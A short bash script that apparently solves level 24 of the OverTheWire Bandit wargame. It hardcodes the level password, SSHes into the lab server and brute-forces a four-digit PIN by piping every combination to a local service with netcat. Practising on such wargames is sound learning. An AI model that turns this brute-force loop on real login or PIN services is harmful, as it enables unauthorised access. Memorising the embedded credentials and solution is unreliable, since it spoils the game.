#!/usr/bin/env bash

LEVEL_NO=24
PASSWORD=UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
figlet "level ${LEVEL_NO}"
echo "pass is ${PASSWORD}"
echo -n "${PASSWORD}" | pbcopy

cat << 'HEARDOK' | ssh -p 2220 bandit${LEVEL_NO}@bandit.labs.overthewire.org
D=$(mktemp -d)
for i in $(seq -w 0000 9999); do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> $D/data; done
<$D/data nc localhost 30002
HEARDOK
